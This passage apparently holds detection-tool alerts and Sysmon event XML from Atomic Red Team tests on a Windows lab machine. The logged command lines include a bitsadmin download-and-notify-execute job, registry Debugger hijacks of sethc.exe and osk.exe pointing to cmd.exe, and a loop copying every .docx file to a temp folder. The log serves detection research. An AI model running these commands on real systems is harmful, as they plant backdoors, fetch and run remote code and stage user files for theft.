+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:31.240293Z"">
+    </TimeCreated>
+    <EventRecordID>3667</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:31.222</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D83F-5D31-0000-00105EF22E00</Data>
+    <Data Name=""ProcessId"">4888</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547711.157171,2019-07-19T18:48:31.157171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /resume AtomicBITS&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:31.134374Z"">
+    </TimeCreated>
+    <EventRecordID>3665</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:31.115</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D83F-5D31-0000-001001EC2E00</Data>
+    <Data Name=""ProcessId"">3760</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /resume AtomicBITS&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547711.04171,2019-07-19T18:48:31.041710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /complete AtomicBITS&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:31.012222Z"">
+    </TimeCreated>
+    <EventRecordID>3663</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:30.995</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-001046E52E00</Data>
+    <Data Name=""ProcessId"">4332</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /complete AtomicBITS&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547710.917348,2019-07-19T18:48:30.917348+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:30.900988Z"">
+    </TimeCreated>
+    <EventRecordID>3661</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:30.882</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-001088DE2E00</Data>
+    <Data Name=""ProcessId"">7072</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547710.807486,2019-07-19T18:48:30.807486+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:30.799468Z"">
+    </TimeCreated>
+    <EventRecordID>3659</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:30.775</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-0010A2D72E00</Data>
+    <Data Name=""ProcessId"">4036</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547807.299766,2019-07-19T18:50:07.299766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:07.279972Z"">
+    </TimeCreated>
+    <EventRecordID>3733</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:07.254</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D89F-5D31-0000-00106C7D3200</Data>
+    <Data Name=""ProcessId"">864</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547807.279972,2019-07-19T18:50:07.279972+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:02.249575Z"">
+    </TimeCreated>
+    <EventRecordID>3732</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:02.238</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D89A-5D31-0000-0010F2703200</Data>
+    <Data Name=""ProcessId"">1132</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547802.194097,2019-07-19T18:50:02.194097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:02.174886Z"">
+    </TimeCreated>
+    <EventRecordID>3729</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:02.144</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D89A-5D31-0000-0010A46B3200</Data>
+    <Data Name=""ProcessId"">1228</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547802.174886,2019-07-19T18:50:02.174886+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:52.275626Z"">
+    </TimeCreated>
+    <EventRecordID>3728</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:52.263</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D890-5D31-0000-001085443200</Data>
+    <Data Name=""ProcessId"">4316</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547792.275626,2019-07-19T18:49:52.275626+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /R c: %%f in (*.docx) do copy %%f c:\temp\&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:52.210871Z"">
+    </TimeCreated>
+    <EventRecordID>3727</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:52.202</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D890-5D31-0000-0010FA3F3200</Data>
+    <Data Name=""ProcessId"">1568</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /R c: %%f in (*.docx) do copy %%f c:\temp\&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
